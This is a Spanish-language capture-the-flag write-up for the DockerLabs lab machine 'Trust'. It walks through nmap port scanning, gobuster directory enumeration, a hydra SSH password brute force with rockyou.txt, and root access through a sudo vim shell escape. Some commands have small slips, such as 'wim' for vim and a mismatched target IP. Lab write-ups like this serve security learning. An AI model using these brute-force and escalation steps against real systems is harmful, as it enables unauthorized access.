⚠️ Este sitio sigue en constantes cambios

Trust

Introducción

En este artículo, explicaré cómo resolví el CTF de la máquina virtual Trust. Describo paso a paso las técnicas y herramientas utilizadas para encontrar y explotar las vulnerabilidades presentes.

Información de la Máquina Virtual

  • Nombre: Trust
  • Autor: El Pingüino de Mario
  • Nivel de Dificultad: Muy Fácil
  • Descripción: Fecha de creación: 02/04/2024

Paso 0: Instalación/Despliegue

  • Descargamos la máquina desde la web de DockerLabs (opens in a new tab).
  • Descomprimimos él .zip unzip trust.zip
  • ejecutamos el archivo de bash sudo bash auto_deplo.sh trust.tar

Paso 1: Reconocimiento

Escaneo de la Red

Al desplegar la máquina me da la IP de la máquina, a sí que me evito el escaneo con Arp

ip image


Después creo una nueva carpeta con el nombre de la máquina para posteriormente entrar al directorio y usar la función mkt(Esta crea 4 carpetas, la llamada content, exploits, nmap y scripts) de mi terminal.

mkdir Trust
cd Trust
mkt

Ahora en la carpeta de nmap realizo un escaneo inicial para identificar los puertos abiertos y exportarlos a un archivo.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Para proseguir con la extracción de los puertos que estaban abiertos del archivo

extractPorts allPorts

Ports image

También para el escaneo de los servicios que corren.

nmap -sCV -p80 172.17.0.2 -oN targeted

Resultado: Services image

Enumeración de Servicios

Ahora se enumeran los directorios de la página web que descubrimos por tener abierto el puerto 80.

gobuster dir -u http://172.17.0.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 200

Resultados: gobuster image

Esto no das como resultado un archivo llamado secret.php, el cual lo podemos ver desde el navegador y nos proporciona el siguiente mensaje, el cual es una pista potencial el cual es un nombre de usuario.

Mario image

Paso 2: Explotación

Se ha identificado un nombre de usuario válido. Podremos probar un ataque de fuerza bruta al protocolo SSH, ya que contamos con el user.

Este sería el comando a utilizar:

hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4

hydra image

ya con esto tenemos la contraseña válida para el usuario mario que es ******. Después podemos hacer login en la máquina a través del protocolo SSH

Elevación de Privilegios

El primer comando para la elevación de privilegios es:

sudo -l

Sudo image

mario puede ejecutar como cualquier usuario el editor Vim.

Después de esto usamos la herramienta searchbins que nos facilita el acceso a GTFOBins.

searchbins -b vim -f sudo

Ahora solo falta escribir el comando que nos arroja, el cual es:

sudo wim -c ':!/bin/sh'

Con el cual ya tenemos usuario administrador Root image

Notas

  • La máquina tuvo el nivel de dificultad esperado, o sea muy fácil